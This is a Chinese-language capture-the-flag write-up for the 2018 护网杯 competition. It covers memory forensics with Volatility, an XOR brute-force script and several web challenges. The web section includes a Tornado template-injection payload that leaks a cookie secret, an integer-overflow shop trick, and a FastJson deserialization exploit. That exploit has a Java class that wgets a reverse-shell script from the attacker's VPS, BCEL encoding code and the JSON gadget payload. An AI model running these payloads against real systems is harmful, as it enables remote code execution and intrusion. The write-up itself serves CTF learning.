NEKO

护网杯wp

2018/10/13

MISC

迟来的签到题

效仿的CSAW2018的一道密码学的题,但提示没CSAW那么坑,爆破异或就行了。

exp.py

1
2
3
4
5
6
7
8
9
10
from __future__ import print_function
s='AAoHAR0nJ1YlUVQnU1BTVCVfUVZRUVUkUCBeUlVWIlBXUiNTXhs='.decode('base64')
flag=''
for i in range(0xff+1):
for j in s:
try:
print(chr(ord(j)^i),end='')
except:
pass
print()

easy_dump

还行吧…说实话这道题并不难,知道是内存取证就直接上手了,只是嵌套了不少知识点。有个小坑是notepad插件不能用,但这玩意google一下就有了。题目里都给了提示下一步要干嘛了,并不是什么难题。
看了各队的wp后发现真是学到了不少,和我的思路一样的没几个…都应该算是非预期了,师傅们强啊ORZ.

下载下来是一个内存dump文件,使用内存取证工具volatility进行分析。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@neko:~# volatility -f easy_dump.img imageinfo
Volatility Foundation Volatility Framework 2.6
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/root/easy_dump.img)
PAE type : No PAE
DTB : 0x187000L
KDBG : 0xf80004006070L
Number of Processors : 1
Image Type (Service Pack) : 0
KPCR for CPU 0 : 0xfffff80004007d00L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2018-09-28 03:49:29 UTC+0000
Image local date and time : 2018-09-28 11:49:29 +0800

选择Win7SP1x64系统,看一下有哪些进程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
root@neko:~# volatility -f easy_dump.img --profile=Win7SP1x64 pslist
Volatility Foundation Volatility Framework 2.6
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xfffffa8007d0ab30 System 4 0 86 473 ------ 0 2018-09-28 09:01:33 UTC+0000
0xfffffa8008331b30 smss.exe 248 4 4 29 ------ 0 2018-09-28 09:01:33 UTC+0000
0xfffffa8009290800 csrss.exe 336 320 8 543 0 0 2018-09-28 09:01:33 UTC+0000
0xfffffa80094fa760 wininit.exe 388 320 7 92 0 0 2018-09-28 09:01:33 UTC+0000
0xfffffa80094fd060 csrss.exe 396 380 10 267 1 0 2018-09-28 09:01:33 UTC+0000
0xfffffa8009939140 winlogon.exe 432 380 6 122 1 0 2018-09-28 09:01:33 UTC+0000
0xfffffa8009982b30 services.exe 492 388 15 228 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa800998a2b0 lsass.exe 500 388 9 610 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa80099337c0 lsm.exe 508 388 11 157 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa80099dc9e0 svchost.exe 600 492 17 375 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa80099fc8e0 vmacthlp.exe 656 492 5 55 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa8009a2a9e0 svchost.exe 696 492 10 305 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa8009a62620 svchost.exe 776 492 20 427 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa8009a90b30 svchost.exe 828 492 23 399 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa8009aac740 svchost.exe 864 492 48 839 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa8009adbb30 audiodg.exe 940 776 6 124 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa8009b20270 svchost.exe 1020 492 17 583 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa8009b712a0 svchost.exe 716 492 20 398 0 0 2018-09-28 09:01:34 UTC+0000
0xfffffa8009c0c1b0 spoolsv.exe 1188 492 16 335 0 0 2018-09-28 09:01:35 UTC+0000
0xfffffa8009c08b30 dwm.exe 1200 828 7 126 1 0 2018-09-28 09:01:35 UTC+0000
0xfffffa8009c27b30 taskhost.exe 1220 492 10 182 1 0 2018-09-28 09:01:35 UTC+0000
0xfffffa8009c32250 svchost.exe 1248 492 24 324 0 0 2018-09-28 09:01:35 UTC+0000
0xfffffa8009c57760 explorer.exe 1312 1164 37 986 1 0 2018-09-28 09:01:35 UTC+0000
0xfffffa8009de3970 VGAuthService. 1544 492 4 88 0 0 2018-09-28 09:01:35 UTC+0000
0xfffffa8009dfcb30 vmtoolsd.exe 1584 492 9 294 0 0 2018-09-28 09:01:35 UTC+0000
0xfffffa8009e38060 vmtoolsd.exe 1628 1312 10 222 1 0 2018-09-28 09:01:35 UTC+0000
0xfffffa800a381b30 TPAutoConnSvc. 2008 492 9 132 0 0 2018-09-28 09:01:36 UTC+0000
0xfffffa800a398060 WmiPrvSE.exe 1108 600 10 186 0 0 2018-09-28 09:01:36 UTC+0000
0xfffffa800a39c060 dllhost.exe 1396 492 20 199 0 0 2018-09-28 09:01:37 UTC+0000
0xfffffa800a3c5b30 dllhost.exe 628 492 18 208 0 0 2018-09-28 09:01:37 UTC+0000
0xfffffa8008abc060 svchost.exe 1532 492 7 95 0 0 2018-09-28 09:01:38 UTC+0000
0xfffffa8009da6b30 msdtc.exe 1008 492 15 155 0 0 2018-09-28 09:01:38 UTC+0000
0xfffffa800a44e060 VSSVC.exe 2168 492 6 119 0 0 2018-09-28 09:01:39 UTC+0000
0xfffffa800a468170 SearchIndexer. 2280 492 15 618 0 0 2018-09-28 09:01:41 UTC+0000
0xfffffa800a529460 SearchProtocol 2356 2280 7 228 1 0 2018-09-28 09:01:42 UTC+0000
0xfffffa800a53b670 SearchFilterHo 2376 2280 5 82 0 0 2018-09-28 09:01:42 UTC+0000
0xfffffa800a5316d0 TPAutoConnect. 2580 2008 5 117 1 0 2018-09-28 09:01:47 UTC+0000
0xfffffa800a4d6580 conhost.exe 2588 396 1 32 1 0 2018-09-28 09:01:47 UTC+0000
0xfffffa800a5d1b30 notepad.exe 2616 1312 1 57 1 0 2018-09-28 09:01:51 UTC+0000
0xfffffa8008b49b30 WmiPrvSE.exe 2712 600 13 293 0 0 2018-09-28 09:01:56 UTC+0000
0xfffffa800ca9ca70 WmiApSrv.exe 2760 492 7 118 0 0 2018-09-28 09:01:58 UTC+0000
0xfffffa80082a3b30 dllhost.exe 2900 600 6 81 0 0 2018-09-28 09:02:14 UTC+0000
0xfffffa8008301930 dllhost.exe 2932 600 7 109 1 0 2018-09-28 09:02:15 UTC+0000
0xfffffa8009bfd710 dllhost.exe 2968 600 6 112 1 0 2018-09-28 09:02:15 UTC+0000
0xfffffa8008a89b30 dllhost.exe 3004 600 10 199 1 0 2018-09-28 09:02:15 UTC+0000
0xfffffa8009e0d510 dllhost.exe 2448 600 6 84 1 0 2018-09-28 09:02:18 UTC+0000
0xfffffa8009b63b30 DumpIt.exe 2500 1312 2 43 1 1 2018-09-28 09:02:18 UTC+0000
0xfffffa8009e12270 conhost.exe 2552 396 2 58 1 0 2018-09-28 09:02:18 UTC+0000

发现notepad.exe进程,但对于win7x64系统,volatility无法使用notepad插件,选择将notepad.exe进程的内存dump下来(可以参考https://www.andreafortuna.org/dfir/volatility-tips-extract-text-typed-in-a-notepad-window-from-a-windows-memory-dump/):

1
2
3
4
root@neko:~# volatility -f easy_dump.img --profile=Win7SP1x64 memdump -D . -p 2616
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing notepad.exe [ 2616] to 2616.dmp

尝试搜索一下flag,由于notepad存储txt使用16位小端序的方式,要使用strings -e l ./2616.dmp | grep flag的方法搜索。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
root@neko:~# strings -e l ./2844.dmp | grep flag
flag{flag is not here,but I put an strange jpg for you,hope you like it :)}
flag{flag is not here,but I put an strange jpg for you,hope you like it :)}
flag{flag is not here,but I put an strange jpg for you,hope you like it :)}
Allow flag to be passed with CreateFile call that indicates to perform downgrade if applicable.
thread_flags
activation_flags
thread_flags
activation_flags
flags
flags
flag{flag is not here,but I put an strange jpg for you,hope you like it :)}
Repairing the flags for file record 0x%1.
The file attributes flag 0x%1 in file 0x%3 is incorrect.
The sparse flag in the standard information attribute in file 0x%1
The sparse flag in the standard information attribute in file 0x%1
The old encrypted flag is being replaced by the new encrypted flag
The encrypted flag in standard information attribute in file 0x%1
The reparse flag in standard information attribute in file 0x%1
The reparse flag in standard information attribute in file 0x%1
The sparse flag of attribute of type 0x%1 and name %2 in file
Cleaning up encrypted flag for file 0x%1.
Cleaning up sparse flag for file 0x%1.
Repairing the flags for file record 0x%1.
The file attributes flag 0x%1 in file 0x%3 is incorrect.
The sparse flag in the standard information attribute in file 0x%1
The sparse flag in the standard information attribute in file 0x%1
The old encrypted flag is being replaced by the new encrypted flag
The encrypted flag in standard information attribute in file 0x%1
The reparse flag in standard information attribute in file 0x%1
The reparse flag in standard information attribute in file 0x%1
The sparse flag of attribute of type 0x%1 and name %2 in file
Cleaning up encrypted flag for file 0x%1.
Cleaning up sparse flag for file 0x%1.
usbflags
usbflags\CLASS_%02X_SUBCLASS_%02X_PROTOCOL_%02X
usbflags\CLASS_%02X_SUBCLASS_%02X
usbflags\CLASS_%02X
usbflags\vvvvpppprrrr
usbflags
usbflags\0E0F00030102
usbflags\0E0F000B0100
usbflags\0E0F00020100
usbflags\0E0F00080100

发现hint:

1
flag{flag is not here,but I put an strange jpg for you,hope you like it :)}

尝试搜索jpg:

1
2
root@neko:~# volatility -f easy_dump.img --profile=Win7SP1x64 filescan | grep jpgVolatility Foundation Volatility Framework 2.6
0x000000002408c460 32 0 RW---- \Device\HarddiskVolume1\phos.jpg

发现一张叫phos.jpg的的图片,将图片dump下来:

1
2
3
4
root@neko:~# volatility -f easy_dump.img --profile=Win7SP1x64 dumpfiles -Q 0x000000002408c460 -D .
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x2408c460 None \Device\HarddiskVolume1\phos.jpg
SharedCacheMap 0x2408c460 None \Device\HarddiskVolume1\phos.jpg

保存到本地改名为phos.jpg后使用binwalk工具查看发现图片后面藏有zip,分离出来解压后是一个ext系统镜像:

1
2
3
4
5
6
7
8
9
root@neko:~# binwalk phos.jpg 

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, EXIF standard
12 0xC TIFF image data, little-endian offset of first image directory: 8
13367 0x3437 Unix path: /www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://
2238922 0x2229CA Zip archive data, at least v2.0 to extract, compressed size: 49478, uncompressed size: 1048576, name: message.img
2288534 0x22EB96 End of Zip archive

将镜像挂载到创建好的文件夹里,里面有hint.txtlost+found空文件夹。
hint.txt打开是一堆坐标,可以用gnuplot工具或者python脚本将图像表示出来。

gnuplot:

1

可以用window下的qr_research工具扫描。

python脚本:

1
2
3
4
5
6
7
8
9
10
11
from PIL import Image

img=Image.new('RGB',(270,270))
imgload=img.load()

with open('hint.txt') as f:
data=f.readlines()
for i in data:
x,y=i.split(' ')
imgload[int(x),int(y)]=(255,255,255)
img.show()

结果:

2

扫描得到hint:

1
Here is the vigenere key: aeolus, but i deleted the encrypted message。

返回到挂载镜像的文件夹里 ls -al:

1
2
3
4
5
6
7
root@neko:~/_phos.jpg.extracted/message# ls -al
总用量 271
drwxr-xr-x 4 root root 1024 9月 28 10:33 .
drwxr-xr-x 3 root root 4096 9月 28 18:05 ..
-rw-r--r-- 1 root root 257163 9月 28 09:13 hint.txt
drwx------ 2 root root 12288 9月 28 09:06 lost+found
drwx------ 4 root root 1024 9月 28 10:33 .Trash-0

.Trash-0/files发现 .message.swp

1
2
3
4
5
root@neko:~/_phos.jpg.extracted/message/.Trash-0/files# ls -la
总用量 14
drwx------ 2 root root 1024 9月 28 10:33 .
drwx------ 4 root root 1024 9月 28 10:33 ..
-rw------- 1 root root 12288 9月 28 08:58 .message.swp

恢复message:vim -r message
得到message内容:

1
yise!dmsx_tthv_arr_didvi

使用vigenere秘钥aeolus解密得到flag:

1
yeet!just_find_and_solve

WEB

easy_laravel

请移步 4uuu Nya的blog: https://qvq.im/
(膜院长)

Itshop

正常只能换4个大辣条,可以通过条件竞争换更多大辣条,用bp的intruder功能跑一下即可。
可以在cookie里发现

1
go_iris_cookie=d6f80149-edbd-4f33-8def-8f423e0321b7

得知后台是go语言写的。
辣条之王那里fuzz一下,发现数目大到一定程度时会提示拥有的大辣条数目不足
由于go使用强类型语言,猜测是整数溢出。
最后测试出是unsigned __int64,而uint64范围为18446744073709551615,
5个大辣条换一个辣条之王,那么换取3689348814741910324个辣条之王要花费18446744073709551620个大辣条,超出uint64范围转换为5,所以只需要5个大辣条即可换3689348814741910324个辣条之王
(膜zer0i3)

easy_tornado

首先这里存在模板注入:

1
http://49.4.79.120:31286/error?msg={{1}}

但过滤很严。
提示render()
在render()的底层实现中找到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
def get_template_namespace(self):
"""Returns a dictionary to be used as the default template namespace.

May be overridden by subclasses to add or modify values.

The results of this method will be combined with additional
defaults in the `tornado.template` module and keyword arguments
to `render` or `render_string`.
"""
namespace = dict(
handler=self,
request=self.request,
current_user=self.current_user,
locale=self.locale,
_=self.locale.translate,
pgettext=self.locale.pgettext,
static_url=self.static_url,
xsrf_form_html=self.xsrf_form_html,
reverse_url=self.reverse_url
)
namespace.update(self.ui)
return namespace

这里返回的namespace中有handler=self,即返回自己定义的一些handler。
payload为

1
http://49.4.79.120:31286/error?msg={{handler.settings}}

得到配置信息,看到cookie_secret。
(膜院长)

easy_web

FastJson反序列化漏洞,这边文章的讲的很细:
https://kevien.github.io/2018/06/18/FastJson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E(%E7%BB%AD)/
evil.java:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
public class evil extends Thread {
private static Thread thread = new evil();
private static String cmd = "wget http://vps/neko.py -O /tmp/neko.py";

static
{
try{
String[] cmds = System.getProperty("os.name").toLowerCase().contains("win")
? new String[]{"cmd.exe","/c",cmd}
: new String[]{"/bin/bash","-c",cmd};
Runtime.getRuntime().exec(cmds);
}
catch(Exception e){
e.printStackTrace();
}

}
}

把java源码编译为java字节码:

1
javac evil.java

得到evil.class
bcel编码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import com.sun.org.apache.bcel.internal.classfile.Utility;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

public class BCELencode {
public static void main(String []args) throws Exception{
//There also should be compiled class file,not java file
Path path = Paths.get("/Users/n3k0/IdeaProjects/java_code/src/evil.class");
byte[] data = Files.readAllBytes(path);
String s = Utility.encode(data,true);
System.out.print(s);
}
}

编写evil.json:

1
2
3
4
5
6
7
8
{
"@type" : "org.apache.tomcat.dbcp.dbcp.BasicDataSource",
"driverClassLoader" :
{
"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassName" : "上个步骤得到的编码"
}

发送evil.json服务端会执行wget http://vps/neko.py -O /tmp/neko.py neko.py为放在自己vps的python反弹shell脚本.
相同操作编写evil.json执行python /tmp/neko.py,vps监听即可得到shell.

原文作者: n3k0

发表日期: October 13th 2018, 9:52:20

发出嘶吼: 没有魔夜2玩我要死了

CATALOG
  1. 1. MISC
    1. 1.1. 迟来的签到题
    2. 1.2. easy_dump
  2. 2. WEB
    1. 2.1. easy_laravel
    2. 2.2. Itshop
    3. 2.3. easy_tornado
    4. 2.4. easy_web